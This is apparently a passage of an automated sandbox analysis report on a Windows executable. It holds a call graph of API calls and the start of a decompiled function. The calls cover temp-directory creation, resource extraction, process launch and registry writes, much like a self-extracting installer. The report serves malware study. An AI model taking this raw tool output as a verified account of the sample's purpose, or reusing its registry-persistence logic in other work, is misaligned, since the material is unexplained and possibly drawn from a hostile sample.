3d5680 2614->2616 2614->2625 2617 3d44b9 20 API calls 2616->2617 2617->2620 2785 3d597d GetCurrentDirectoryA SetCurrentDirectoryA 2618->2785 2621 3d5730 GetFileAttributesA 2619->2621 2635 3d572b 2619->2635 2620->2625 2621->2635 2625->2606 2626 3d5467 49 API calls 2626->2610 2627 3d2630 21 API calls 2627->2635 2629 3d57c1 GetWindowsDirectoryA 2629->2635 2630 3d597d 34 API calls 2630->2635 2631 3d658a CharPrevA 2632 3d57e8 GetFileAttributesA 2631->2632 2633 3d57fa CreateDirectoryA 2632->2633 2632->2635 2633->2635 2634 3d5827 SetFileAttributesA 2634->2635 2635->2618 2635->2619 2635->2621 2635->2625 2635->2627 2635->2629 2635->2630 2635->2631 2635->2634 2636 3d5467 49 API calls 2635->2636 2781 3d6952 2635->2781 2636->2635 2638 3d6249 2637->2638 2639 3d6268 2637->2639 2641 3d44b9 20 API calls 2638->2641 2640 3d597d 34 API calls 2639->2640 2642 3d6277 2640->2642 2643 3d625a 2641->2643 2644 3d6ce0 4 API calls 2642->2644 2645 3d6285 GetLastError 2643->2645 2647 3d3013 2644->2647 2646 3d625f 2645->2646 2646->2642 2647->2287 2647->2298 2649 3d3b2d 2648->2649 2649->2649 2650 3d3b72 2649->2650 2651 3d3b53 2649->2651 2852 3d4fe0 2650->2852 2653 3d6517 24 API calls 2651->2653 2654 3d3b70 2653->2654 2655 3d6298 10 API calls 2654->2655 2656 3d3b7b 2654->2656 2655->2656 2656->2304 2658 3d2583 2657->2658 2659 3d2622 2657->2659 2660 3d25e8 RegOpenKeyExA 2658->2660 2661 3d258b 2658->2661 2906 3d24e0 GetWindowsDirectoryA 2659->2906 2663 3d2609 RegQueryInfoKeyA 2660->2663 2664 3d25e3 2660->2664 2661->2664 2665 3d259b RegOpenKeyExA 2661->2665 2666 3d25d1 RegCloseKey 2663->2666 2664->2309 2665->2664 2667 3d25bc RegQueryValueExA 2665->2667 2666->2664 2667->2666 2669 3d3bec 2668->2669 2670 3d3bdb 2668->2670 2672 3d3c03 memset 2669->2672 2673 3d3d13 2669->2673 2678 3d3d7b CompareStringA 2669->2678 2679 3d3f4d 2669->2679 2680 3d3fd7 2669->2680 2681 3d3fab 2669->2681 2685 3d3f1e LocalFree 2669->2685 2686 3d3f46 LocalFree 2669->2686 2689 3d468f 7 API calls 2669->2689 2691 3d3cc7 CompareStringA 2669->2691 2702 3d3e10 2669->2702 2914 3d1ae8 2669->2914 2954 3d202a memset memset RegCreateKeyExA 2669->2954 2980 3d3fef 2669->2980 2671 3d468f 7 API calls 2670->2671 2671->2669 2672->2669 2674 3d44b9 20 API calls 2673->2674 2701 3d3d26 2674->2701 2676 3d6ce0 4 API calls 2677 3d3f60 2676->2677 2677->2314 2678->2669 2678->2680 2679->2676 2680->2679 3004 3d2267 2680->3004 2684 3d44b9 20 API calls 2681->2684 2688 3d3fbe LocalFree 2684->2688 2685->2669 2685->2680 2686->2679 2688->2679 2689->2669 2691->2669 2692 3d3e1f GetProcAddress 2694 3d3f64 2692->2694 2692->2702 2693 3d3f92 2695 3d44b9 20 API calls 2693->2695 2697 3d44b9 20 API calls 2694->2697 2696 3d3fa9 2695->2696 2698 3d3f7c LocalFree 2696->2698 2699 3d3f75 FreeLibrary 2697->2699 2700 3d6285 GetLastError 2698->2700 2699->2698 2700->2701 2701->2679 2702->2692 2702->2693 2703 3d3eff FreeLibrary 2702->2703 2704 3d3f40 FreeLibrary 2702->2704 2994 3d6495 2702->2994 2703->2685 2704->2686 2706 3d468f 7 API calls 2705->2706 2707 3d3a55 LocalAlloc 2706->2707 2708 3d3a6c 2707->2708 2709 3d3a8e 2707->2709 2710 3d44b9 20 API calls 2708->2710 2711 3d468f 7 API calls 2709->2711 2712 3d3a7d 2710->2712 2713 3d3a98 2711->2713 2714 3d6285 GetLastError 2712->2714 2715 3d3a9c 2713->2715 2716 3d3ac5 lstrcmpA 2713->2716 2717 3d2f64 2714->2717 2718 3d44b9 20 API calls 2715->2718 2719 3d3b0d LocalFree 2716->2719 2720 3d3ada 2716->2720 2717->2278 2717->2287 2722 3d3aad LocalFree 2718->2722 2719->2717 2721 3d6517 24 API calls 2720->2721 2723 3d3aec LocalFree 2721->2723 2722->2717 2723->2717 2725 3d303c 2724->2725 2725->2287 2727 3d468f 7 API calls 2726->2727 2728 3d417d LocalAlloc 2727->2728 2729 3d41a8 2728->2729 2730 3d4195 2728->2730 2731 3d468f 7 API calls 2729->2731 2732 3d44b9 20 API calls 2730->2732 2733 3d41b5 2731->2733 2734 3d41a6 2732->2734 2735 3d41b9 2733->2735 2736 3d41c5 lstrcmpA 2733->2736 2734->2287 2738 3d44b9 20 API calls 2735->2738 2736->2735 2737 3d41e6 LocalFree 2736->2737 2737->2734 2738->2737 2740 3d171e _vsnprintf 2739->2740 2741 3d62c9 FindResourceA 2740->2741 2743 3d62cb LoadResource LockResource 2741->2743 2744 3d6353 2741->2744 2743->2744 2747 3d62e0 2743->2747 2745 3d6ce0 4 API calls 2744->2745 2746 3d51ca 2745->2746 2746->2583 2746->2584 2748 3d631b FreeResource 2747->2748 2749 3d6355 FreeResource 2747->2749 2750 3d171e _vsnprintf 2748->2750 2749->2744 2750->2741 2752 3d548a 2751->2752 2769 3d551a 2751->2769 2812 3d53a1 2752->2812 2754 3d5581 2758 3d6ce0 4 API calls 2754->2758 2757 3d5495 2757->2754 2761 3d550c 2757->2761 2762 3d54c2 GetSystemInfo 2757->2762 2763 3d559a 2758->2763 2759 3d554d 2759->2754 2766 3d597d 34 API calls 2759->2766 2760 3d553b CreateDirectoryA 2764 3d5577 2760->2764 2765 3d5547 2760->2765 2767 3d658a CharPrevA 2761->2767 2771 3d54da 2762->2771 2763->2625 2775 3d2630 GetWindowsDirectoryA 2763->2775 2768 3d6285 GetLastError 2764->2768 2765->2759 2772 3d555c 2766->2772 2767->2769 2770 3d557c 2768->2770 2823 3d58c8 2769->2823 2770->2754 2771->2761 2773 3d658a CharPrevA 2771->2773 2772->2754 2774 3d5568 RemoveDirectoryA 2772->2774 2773->2761 2774->2754 2776 3d266f 2775->2776 2777 3d265e 2775->2777 2779 3d6ce0 4 API calls 2776->2779 2778 3d44b9 20 API calls 2777->2778 2778->2776 2780 3d2687 2779->2780 2780->2610 2780->2626 2782 3d696e GetDiskFreeSpaceA 2781->2782 2783 3d69a1 2781->2783 2782->2783 2784 3d6989 MulDiv 2782->2784 2783->2635 2784->2783 2786 3d59dd GetDiskFreeSpaceA 2785->2786 2787 3d59bb 2785->2787 2789 3d5ba1 memset 2786->2789 2790 3d5a21 MulDiv 2786->2790 2788 3d44b9 20 API calls 2787->2788 2791 3d59cc 2788->2791 2792 3d6285 GetLastError 2789->2792 2790->2789 2793 3d5a50 GetVolumeInformationA 2790->2793 2794 3d6285 GetLastError 2791->2794 2795 3d5bbc GetLastError FormatMessageA 2792->2795 2796 3d5a6e memset 2793->2796 2797 3d5ab5 SetCurrentDirectoryA 2793->2797 2798 3d59d1 2794->2798 2799 3d5be3 2795->2799 2800 3d6285 GetLastError 2796->2800 2806 3d5acc 2797->2806 2810 3d5b94 2798->2810 2801 3d44b9 20 API calls 2799->2801 2802 3d5a89 GetLastError FormatMessageA 2800->2802 2804 3d5bf5 SetCurrentDirectoryA 2801->2804 2802->2799 2803 3d6ce0 4 API calls 2805 3d5c11 2803->2805 2804->2810 2805->2610 2807 3d5b0a 2806->2807 2809 3d5b20 2806->2809 2808 3d44b9 20 API calls 2807->2808 2808->2798 2809->2810 2835 3d268b 2809->2835 2810->2803 2814 3d53bf 2812->2814 2813 3d171e _vsnprintf 2813->2814 2814->2813 2815 3d658a CharPrevA 2814->2815 2819 3d5415 GetTempFileNameA 2814->2819 2816 3d53fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 3d544f CreateDirectoryA 2816->2817 2818 3d543a 2817->2818 2817->2819 2821 3d6ce0 4 API calls 2818->2821 2819->2818 2820 3d5429 DeleteFileA CreateDirectoryA 2819->2820 2820->2818 2822 3d5449 2821->2822 2822->2757 2824 3d58d8 2823->2824 2824->2824 2825 3d58df LocalAlloc 2824->2825 2826 3d5919 2825->2826 2827 3d58f3 2825->2827 2829 3d658a CharPrevA 2826->2829 2828 3d44b9 20 API calls 2827->2828 2833 3d5906 2828->2833 2831 3d5931 CreateFileA LocalFree 2829->2831 2830 3d6285 GetLastError 2834 3d5534 2830->2834 2832 3d595b CloseHandle GetFileAttributesA 2831->2832 2831->2833 2832->2833 2833->2830 2833->2834 2834->2759 2834->2760 2836 3d26b9 2835->2836 2837 3d26e5 2835->2837 2838 3d171e _vsnprintf 2836->2838 2839 3d271f 2837->2839 2840 3d26ea 2837->2840 2842 3d26cc 2838->2842 2841 3d26e3 2839->2841 2844 3d171e _vsnprintf 2839->2844 2843 3d171e _vsnprintf 2840->2843 2845 3d6ce0 4 API calls 2841->2845 2846 3d44b9 20 API calls 2842->2846 2847 3d26fd 2843->2847 2848 3d2735 2844->2848 2849 3d276d 2845->2849 2846->2841 2850 3d44b9 20 API calls 2847->2850 2851 3d44b9 20 API calls 2848->2851 2849->2810 2850->2841 2851->2841 2853 3d468f 7 API calls 2852->2853 2854 3d4ff5 FindResourceA LoadResource LockResource 2853->2854 2855 3d5020 2854->2855 2870 3d515f 2854->2870 2856 3d5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2856 2857 3d5057 2855->2857 2856->2857 2874 3d4efd 2857->2874 2860 3d507c 2864 3d50e8 2860->2864 2868 3d5106 2860->2868 2861 3d5060 2862 3d44b9 20 API calls 2861->2862 2863 3d5075 2862->2863 2863->2868 2865 3d44b9 20 API calls 2864->2865 2865->2863 2866 3d511d 2869 3d5129 2866->2869 2871 3d513a 2866->2871 2867 3d5110 FreeResource 2867->2866 2868->2866 2868->2867 2872 3d44b9 20 API calls 2869->2872 2870->2654 2871->2870 2873 3d514c SendMessageA 2871->2873 2872->2871 2873->2870 2875 3d4f4a 2874->2875 2881 3d4fa1 2875->2881 2882 3d4980 2875->2882 2877 3d6ce0 4 API calls 2879 3d4fc6 2877->2879 2879->2860 2879->2861 2881->2877 2883 3d4990 2882->2883 2884 3d49a5 2883->2884 2885 3d49c2 lstrcmpA 2883->2885 2886 3d44b9 20 API calls 2884->2886 2887 3d4a0e 2885->2887 2888 3d49ba 2885->2888 2886->2888 2887->2888 2893 3d487a 2887->2893 2888->2881 2890 3d4b60 2888->2890 2891 3d4b76 2890->2891 2892 3d4b92 FindCloseChangeNotification 2890->2892 2891->2881 2892->2891 2894 3d48a2 CreateFileA 2893->2894 2896 3d48e9 2894->2896 2897 3d4908 2894->2897 2896->2897 2898 3d48ee 2896->2898 2897->2888 2901 3d490c 2898->2901 2902 3d48f5 CreateFileA 2901->2902 2903 3d4917 2901->2903 2902->2897 2903->2902 2904 3d4962 CharNextA 2903->2904 2905 3d4953 CreateDirectoryA 2903->2905 2904->2903 2905->2904 2907 3d255b 2906->2907 2908 3d2510 2906->2908 2909 3d6ce0 4 API calls 2907->2909 2910 3d658a CharPrevA 2908->2910 2912 3d2569 2909->2912 2911 3d2522 WritePrivateProfileStringA _lopen 2910->2911 2911->2907 2913 3d2548 _llseek _lclose 2911->2913 2912->2664 2913->2907 2915 3d1b25 2914->2915 3018 3d1a84 2915->3018 2917 3d1b57 2918 3d658a CharPrevA 2917->2918 2919 3d1b8c 2917->2919 2918->2919 2920 3d66c8 2 API calls 2919->2920 2921 3d1bd1 2920->2921 2922 3d1bd9 CompareStringA 2921->2922 2923 3d1d73 2921->2923 2922->2923 2924 3d1bf7 GetFileAttributesA 2922->2924 2925 3d66c8 2 API calls 2923->2925 2927 3d1c0d 2924->2927 2928 3d1d53 2924->2928 2926 3d1d7d 2925->2926 2929 3d1df8 LocalAlloc 2926->2929 2930 3d1d81 CompareStringA 2926->2930 2927->2928 2931 3d1a84 2 API calls 2927->2931 2933 3d44b9 20 API calls 2928->2933 2929->2928 2932 3d1e0b GetFileAttributesA 2929->2932 2930->2929 2937 3d1d9b 2930->2937 2934 3d1c31 2931->2934 2940 3d1e1d 2932->2940 2952 3d1e45 2932->2952 2951 3d1cc2 2933->2951 2935 3d1c50 LocalAlloc 2934->2935 2941 3d1a84 2 API calls 2934->2941 2935->2928 2938 3d1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2935->2938 2936 3d1e89 2939 3d6ce0 4 API calls 2936->2939 2937->2937 2942 3d1dbe LocalAlloc 2937->2942 2947 3d1cf8 2938->2947 2938->2951 2945 3d1ea1 2939->2945 2940->2952 2941->2935 2942->2928 2946 3d1de1 2942->2946 2945->2669 2950 3d171e _vsnprintf 2946->2950 2948 3d1d09 GetShortPathNameA 2947->2948 2949 3d1d23 2947->2949 2948->2949 2953 3d171e _vsnprintf 2949->2953 2950->2951 2951->2936 3024 3d2aac 2952->3024 2953->2951 2955 3d209a 2954->2955 2956 3d2256 2954->2956 2958 3d171e _vsnprintf 2955->2958 2961 3d20dc 2955->2961 2957 3d6ce0 4 API calls 2956->2957 2959 3d2263 2957->2959 2960 3d20af RegQueryValueExA 2958->2960 2959->2669 2960->2955 2960->2961 2962 3d20fb GetSystemDirectoryA 2961->2962 2963 3d20e4 RegCloseKey 2961->2963 2964 3d658a CharPrevA 2962->2964 2963->2956 2965 3d211b LoadLibraryA 2964->2965 2966 3d212e GetProcAddress FreeLibrary 2965->2966 2967 3d2179 GetModuleFileNameA 2965->2967 2966->2967 2969 3d214e GetSystemDirectoryA 2966->2969 2968 3d21de RegCloseKey 2967->2968 2972 3d2177 2967->2972 2968->2956 2970 3d2165 2969->2970 2969->2972 2971 3d658a CharPrevA 2970->2971 2971->2972 2972->2972 2973 3d21b7 LocalAlloc 2972->2973 2974 3d21cd 2973->2974 2975 3d21ec 2973->2975 2976 3d44b9 20 API calls 2974->2976 2977 3d171e _vsnprintf 2975->2977 2976->2968 2978 3d2218 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2956 2981 3d4106 2980->2981 2982 3d4016 CreateProcessA 2980->2982 2985 3d6ce0 4 API calls 2981->2985 2983 3d40c4 2982->2983 2984 3d4041 WaitForSingleObject GetExitCodeProcess 2982->2984 2987 3d6285 GetLastError 2983->2987 2992 3d4070 2984->2992 2986 3d4117 2985->2986 2986->2669 2989 3d40c9 GetLastError FormatMessageA 2987->2989 2991 3d44b9 20 API calls 2989->2991 2990 3d4096 CloseHandle CloseHandle 2990->2981 2993 3d40ba 2990->2993 2991->2981 3051 3d411b 2992->3051 2993->2981 2995 3d64c2 2994->2995 2996 3d658a CharPrevA 2995->2996 2997 3d64d8 GetFileAttributesA 2996->2997 2998 3d64ea 2997->2998 2999 3d6501 LoadLibraryA 2997->2999 2998->2999 3000 3d64ee LoadLibraryExA 2998->3000 3001 3d6508 2999->3001 3000->3001 3002 3d6ce0 4 API calls 3001->3002 3003 3d6513 3002->3003 3003->2702 3005 3d2289 RegOpenKeyExA 3004->3005 3006 3d2381 3004->3006 3005->3006 3008 3d22b1 RegQueryValueExA 3005->3008 3007 3d6ce0 4 API calls 3006->3007 3009 3d238c 3007->3009 3010 3d2374 RegCloseKey 3008->3010 3011 3d22e6 memset GetSystemDirectoryA 3008->3011 3009->2679 3010->3006 3012 3d230f 3011->3012 3013 3d2321 3011->3013 3014 3d658a CharPrevA 3012->3014 3015 3d171e _vsnprintf 3013->3015 3014->3013 3016 3d233f RegSetValueExA 3015->3016 3016->3010 3019 3d1a9a 3018->3019 3021 3d1aba 3019->3021 3023 3d1aaf 3019->3023 3037 3d667f 3019->3037 3021->2917 3022 3d667f 2 API calls 3022->3023 3023->3021 3023->3022 3025 3d2be6 3024->3025 3026 3d2ad4 GetModuleFileNameA 3024->3026 3027 3d6ce0 4 API calls 3025->3027 3035 3d2b02 3026->3035 3029 3d2bf5 3027->3029 3028 3d2af1 IsDBCSLeadByte 3028->3035 3029->2936 3030 3d2bca CharNextA 3032 3d2bd3 CharNextA 3030->3032 3031 3d2b11 CharNextA CharUpperA 3033 3d2b8d CharUpperA 3031->3033 3031->3035 3032->3035 3033->3035 3035->3025 3035->3028 3035->3030 3035->3031 3035->3032 3036 3d2b43 CharPrevA 3035->3036 3042 3d65e8 3035->3042 3036->3035 3040 3d6689 3037->3040 3038 3d6648 IsDBCSLeadByte 3038->3040 3039 3d66a5 3039->3019 3040->3038 3040->3039 3041 3d6697 CharNextA 3040->3041 3041->3040 3043 3d65f4 3042->3043 3043->3043 3044 3d65fb CharPrevA 3043->3044 3045 3d6611 CharPrevA 3044->3045 3046 3d661e 3045->3046 3047 3d660b 3045->3047 3048 3d663d 3046->3048 3049 3d6634 CharNextA 3046->3049 3050 3d6627 CharPrevA 3046->3050 3047->3045 3047->3046 3048->3035 3049->3048 3050->3048 3050->3049 3052 3d4132 3051->3052 3054 3d412a 3051->3054 3055 3d1ea7 3052->3055 3054->2990 3056 3d1eba 3055->3056 3058 3d1ed3 3055->3058 3057 3d256d 15 API calls 3056->3057 3057->3058 3058->3054 3060 3d2026 3059->3060 3061 3d1ff0 RegOpenKeyExA 3059->3061 3060->2320 3061->3060 3062 3d200f RegDeleteValueA RegCloseKey 3061->3062 3062->3060 3173 3d6a20 __getmainargs 3174 3d19e0 3175 3d1a24 GetDesktopWindow 3174->3175 3176 3d1a03 3174->3176 3178 3d43d0 11 API calls 3175->3178 3177 3d1a20 3176->3177 3179 3d1a16 EndDialog 3176->3179 3181 3d6ce0 4 API calls 3177->3181 3180 3d1a33 LoadStringA SetDlgItemTextA MessageBeep 3178->3180 3179->3177 3180->3177 3182 3d1a7e 3181->3182 3063 3d4ad0 3071 3d3680 3063->3071 3066 3d4aee WriteFile 3068 3d4b0f 3066->3068 3069 3d4b14 3066->3069 3067 3d4ae9 3069->3068 3070 3d4b3b SendDlgItemMessageA 3069->3070 3070->3068 3072 3d3691 MsgWaitForMultipleObjects 3071->3072 3073 3d36a9 PeekMessageA 3072->3073 3074 3d36e8 3072->3074 3073->3072 3075 3d36bc 3073->3075 3074->3066 3074->3067 3075->3072 3075->3074 3076 3d36c7 DispatchMessageA 3075->3076 3077 3d36d1 PeekMessageA 3075->3077 3076->3077 3077->3075 3078 3d4cd0 3079 3d4d0b 3078->3079 3080 3d4cf4 3078->3080 3081 3d4d02 3079->3081 3084 3d4dcb 3079->3084 3087 3d4d25 3079->3087 3080->3081 3082 3d4b60 FindCloseChangeNotification 3080->3082 3083 3d6ce0 4 API calls 3081->3083 3082->3081 3085 3d4e95 3083->3085 3086 3d4dd4 SetDlgItemTextA 3084->3086 3088 3d4de3 3084->3088 3086->3088 3087->3081 3101 3d4c37 3087->3101 3088->3081 3106 3d476d 3088->3106 3092 3d4e38 3092->3081 3094 3d4980 25 API calls 3092->3094 3093 3d4b60 FindCloseChangeNotification 3095 3d4d99 SetFileAttributesA 3093->3095 3096 3d4e56 3094->3096 3095->3081 3096->3081 3097 3d4e64 3096->3097 3115 3d47e0 LocalAlloc 3097->3115 3100 3d4e6f 3100->3081 3102 3d4c88 3101->3102 3103 3d4c4c DosDateTimeToFileTime 3101->3103 3102->3081 3102->3093 3103->3102 3104 3d4c5e LocalFileTimeToFileTime 3103->3104 3104->3102 3105 3d4c70 SetFileTime 3104->3105 3105->3102 3124 3d66ae GetFileAttributesA 3106->3124 3108 3d477b 3108->3092 3109 3d47cc SetFileAttributesA 3111 3d47db 3109->3111 3111->3092 3112 3d6517 24 API calls 3113 3d47b1 3112->3113 3113->3109 3113->3111 3114 3d47c2 3113->3114 3114->3109 3116 3d480f LocalAlloc 3115->3116 3117 3d47f6 3115->3117 3120 3d4831 3116->3120 3123 3d480b 3116->3123 3118 3d44b9 20 API calls 3117->3118 3118->3123 3121 3d44b9 20 API calls 3120->3121 3122 3d4846 LocalFree 3121->3122 3122->3123 3123->3100 3125 3d4777 3124->3125 3125->3108 3125->3109 3125->3112 3183 3d3210 3184 3d3227 3183->3184 3207 3d328e EndDialog 3183->3207 3185 3d3235 3184->3185 3186 3d33e2 GetDesktopWindow 3184->3186 3190 3d32dd GetDlgItemTextA 3185->3190 3191 3d324c 3185->3191 3198 3d3239 3185->3198 3188 3d43d0 11 API calls 3186->3188 3189 3d33f1 SetWindowTextA SendDlgItemMessageA 3188->3189 3192 3d341f GetDlgItem EnableWindow 3189->3192 3189->3198 3199 3d32fc 3190->3199 3215 3d3366 3190->3215 3193 3d32c5 EndDialog 3191->3193 3194 3d3251 3191->3194 3192->3198 3193->3198 3195 3d325c LoadStringA 3194->3195 3194->3198 3197 3d3294 3195->3197 3208 3d327b 3195->3208 3196 3d44b9 20 API calls 3196->3198 3221 3d4224 LoadLibraryA 3197->3221 3202 3d3331 GetFileAttributesA 3199->3202 3199->3215 3205 3d337c 3202->3205 3206 3d333f 3202->3206 3203 3d44b9 20 API calls 3203->3207 3204 3d32a5 SetDlgItemTextA 3204->3198 3204->3208 3209 3d658a CharPrevA 3205->3209 3210 3d44b9 20 API calls 3206->3210 3207->3198 3208->3203 3211 3d338d 3209->3211 3212 3d3351 3210->3212 3213 3d58c8 27 API calls 3211->3213 3212->3198 3214 3d335a CreateDirectoryA 3212->3214 3216 3d3394 3213->3216 3214->3205 3214->3215 3215->3196 3216->3215 3217 3d33a4 3216->3217 3218 3d33c7 EndDialog 3217->3218 3219 3d597d 34 API calls 3217->3219 3218->3198 3220 3d33c3 3219->3220 3220->3198 3220->3218 3222 3d4246 GetProcAddress 3221->3222 3223 3d43b2 3221->3223 3224 3d425d GetProcAddress 3222->3224 3225 3d43a4 FreeLibrary 3222->3225 3227 3d44b9 20 API calls 3223->3227 3224->3225 3226 3d4274 GetProcAddress 3224->3226 3225->3223 3226->3225 3228 3d428b 3226->3228 3230 3d329d 3227->3230 3229 3d4295 GetTempPathA 3228->3229 3235 3d42e1 3228->3235 3231 3d42ad 3229->3231 3230->3198 3230->3204 3231->3231 3232 3d42b4 CharPrevA 3231->3232 3233 3d42d0 CharPrevA 3232->3233 3232->3235 3233->3235 3234 3d4390 FreeLibrary 3234->3230 3235->3234 3236 3d4a50 3237 3d4a9f ReadFile 3236->3237 3238 3d4a66 3236->3238 3240 3d4abb 3237->3240 3239 3d4a82 memcpy 3238->3239 3238->3240 3239->3240 3241 3d3450 3242 3d345e 3241->3242 3243 3d34d3 EndDialog 3241->3243 3245 3d349a GetDesktopWindow 3242->3245 3246 3d3465 3242->3246 3244 3d346a 3243->3244 3247 3d43d0 11 API calls 3245->3247 3246->3244 3249 3d348c EndDialog 3246->3249 3248 3d34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3247->3248 3248->3244 3249->3244 3126 3d6f40 SetUnhandledExceptionFilter 3127 3d4cc0 GlobalFree 3250 3d4200 3251 3d421e 3250->3251 3252 3d420b SendMessageA 3250->3252 3252->3251 3253 3d3100 3254 3d3111 3253->3254 3255 3d31b0 3253->3255 3259 3d3149 GetDesktopWindow 3254->3259 3262 3d311d 3254->3262 3256 3d31b9 SendDlgItemMessageA 3255->3256 3257 3d3141 3255->3257 3256->3257 3258 3d3138 EndDialog 3258->3257 3260 3d43d0 11 API calls 3259->3260 3261 3d315d 6 API calls 3260->3261 3261->3257 3262->3257 3262->3258 3263 3d4bc0 3264 3d4bd7 3263->3264 3266 3d4c05 3263->3266 3265 3d4c1b SetFilePointer 3265->3264 3266->3264 3266->3265 3267 3d30c0 3268 3d30de CallWindowProcA 3267->3268 3269 3d30ce 3267->3269 3270 3d30da 3268->3270 3269->3268 3269->3270 3271 3d63c0 3272 3d6407 3271->3272 3273 3d658a CharPrevA 3272->3273 3274 3d6415 CreateFileA 3273->3274 3275 3d6448 WriteFile 3274->3275 3276 3d643a 3274->3276 3277 3d6465 CloseHandle 3275->3277 3279 3d6ce0 4 API calls 3276->3279 3277->3276 3280 3d648f 3279->3280 3281 3d6c03 3282 3d6c1e 3281->3282 3283 3d6c17 _exit 3281->3283 3284 3d6c27 _cexit 3282->3284 3285 3d6c32 3282->3285 3283->3282 3284->3285

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_003D3A3F 16 Function_003D6517 0->16 51 Function_003D44B9 0->51 74 Function_003D468F 0->74 78 Function_003D6285 0->78 1 Function_003D6C3F 2 Function_003D4C37 3 Function_003D2630 3->51 105 Function_003D6CE0 3->105 4 Function_003D6E2A 89 Function_003D6CF0 4->89 5 Function_003D202A 12 Function_003D171E 5->12 5->51 77 Function_003D658A 5->77 5->105 6 Function_003D4224 6->51 82 Function_003D1680 6->82 7 Function_003D3B26 7->16 69 Function_003D6298 7->69 103 Function_003D4FE0 7->103 8 Function_003D7120 9 Function_003D6A20 10 Function_003D2F1D 10->0 10->7 13 Function_003D621E 10->13 32 Function_003D256D 10->32 34 Function_003D4169 10->34 35 Function_003D5164 10->35 10->51 62 Function_003D55A0 10->62 65 Function_003D3BA2 10->65 10->77 10->78 101 Function_003D51E5 10->101 10->105 11 Function_003D681F 87 Function_003D66F9 11->87 11->105 26 Function_003D597D 13->26 13->51 13->78 13->105 14 Function_003D411B 59 Function_003D1EA7 14->59 15 Function_003D5C17 16->51 17 Function_003D3210 17->6 17->26 17->51 17->77 111 Function_003D43D0 17->111 113 Function_003D58C8 17->113 18 Function_003D7010 19 Function_003D490C 20 Function_003D7208 21 Function_003D7000 22 Function_003D4200 23 Function_003D3100 23->111 24 Function_003D6C03 47 Function_003D724D 24->47 25 Function_003D4702 54 Function_003D16B3 25->54 25->82 26->51 76 Function_003D268B 26->76 26->78 26->105 27 Function_003D667F 48 Function_003D6648 27->48 28 Function_003D487A 28->19 29 Function_003D7270 30 Function_003D6C70 31 Function_003D2773 31->77 80 Function_003D1781 31->80 31->82 31->105 106 Function_003D24E0 32->106 33 Function_003D476D 33->16 56 Function_003D66AE 33->56 34->51 34->74 35->51 35->69 35->74 36 Function_003D5467 36->26 60 Function_003D53A1 36->60 36->77 36->78 36->80 36->82 36->105 36->113 37 Function_003D2267 37->12 37->77 37->105 38 Function_003D6A60 38->1 38->20 40 Function_003D7060 38->40 42 Function_003D7155 38->42 38->47 88 Function_003D2BFB 38->88 39 Function_003D4B60 40->8 40->18 41 Function_003D6760 43 Function_003D6F54 43->20 43->47 44 Function_003D4A50 45 Function_003D3450 45->111 46 Function_003D6952 49 Function_003D6F40 50 Function_003D6FBE 50->43 51->11 51->12 51->82 51->105 112 Function_003D67C9 51->112 52 Function_003D52B6 71 Function_003D2390 52->71 52->80 99 Function_003D65E8 52->99 102 Function_003D1FE1 52->102 52->105 53 Function_003D69B0 53->21 53->30 53->50 93 Function_003D71EF 53->93 54->80 55 Function_003D2AAC 55->82 55->99 55->105 115 Function_003D17C8 55->115 57 Function_003D2CAA 57->16 57->51 64 Function_003D18A3 57->64 67 Function_003D5C9E 57->67 57->71 57->74 95 Function_003D36EE 57->95 57->105 58 Function_003D6FA5 58->47 59->32 60->12 60->77 60->82 60->105 61 Function_003D6FA1 62->3 62->16 62->26 62->36 62->46 62->51 62->74 62->77 62->78 62->80 62->105 63 Function_003D4CA0 96 Function_003D17EE 64->96 64->105 65->5 65->37 65->51 70 Function_003D6495 65->70 65->74 65->78 65->80 92 Function_003D3FEF 65->92 97 Function_003D1AE8 65->97 65->105 66 Function_003D72A2 67->4 67->15 67->27 67->51 67->77 67->82 104 Function_003D31E0 67->104 67->105 114 Function_003D66C8 67->114 68 Function_003D4E99 68->82 69->12 69->105 70->77 70->80 70->105 71->54 71->71 71->77 71->82 71->105 72 Function_003D1F90 72->51 72->59 72->105 73 Function_003D6793 75 Function_003D2A89 76->12 76->51 76->105 77->54 79 Function_003D1A84 79->27 81 Function_003D4980 81->28 81->51 82->80 83 Function_003D3680 84 Function_003D6380 85 Function_003D4EFD 85->39 85->81 85->105 86 Function_003D70FE 88->10 88->52 88->57 88->72 90 Function_003D34F0 90->51 90->83 90->111 91 Function_003D6EF0 92->14 92->51 92->78 92->105 94 Function_003D6BEF 95->11 95->51 95->75 98 Function_003D28E8 95->98 95->105 95->112 96->105 97->12 97->51 97->54 97->55 97->77 97->79 97->80 97->82 97->105 97->114 98->31 98->75 100 Function_003D70EB 101->51 101->74 101->78 103->51 103->74 103->85 105->89 106->77 106->105 107 Function_003D19E0 107->105 107->111 108 Function_003D47E0 108->51 108->82 109 Function_003D4AD0 109->83 110 Function_003D4CD0 110->2 110->25 110->33 110->39 110->68 110->81 110->105 110->108 111->105 112->73 113->51 113->77 113->78 113->82 114->48 116 Function_003D4CC0 117 Function_003D4BC0 118 Function_003D30C0 119 Function_003D63C0 119->77 119->80 119->105

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E003D202A(struct HINSTANCE__* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				int _v536;
                                                                        				int _v540;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				long _t36;
                                                                        				long _t41;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				CHAR* _t54;
                                                                        				void _t56;
                                                                        				signed int _t66;
                                                                        				intOrPtr* _t72;
                                                                        				void* _t73;
                                                                        				void* _t75;
                                                                        				void* _t80;
                                                                        				intOrPtr* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				void* _t90;
                                                                        				_Unknown_base(*)()* _t91;
                                                                        				signed int _t93;
                                                                        				void* _t94;
                                                                        				void* _t95;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_t28 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t28 ^ _t93;
                                                                        				_t84 = 0x104;
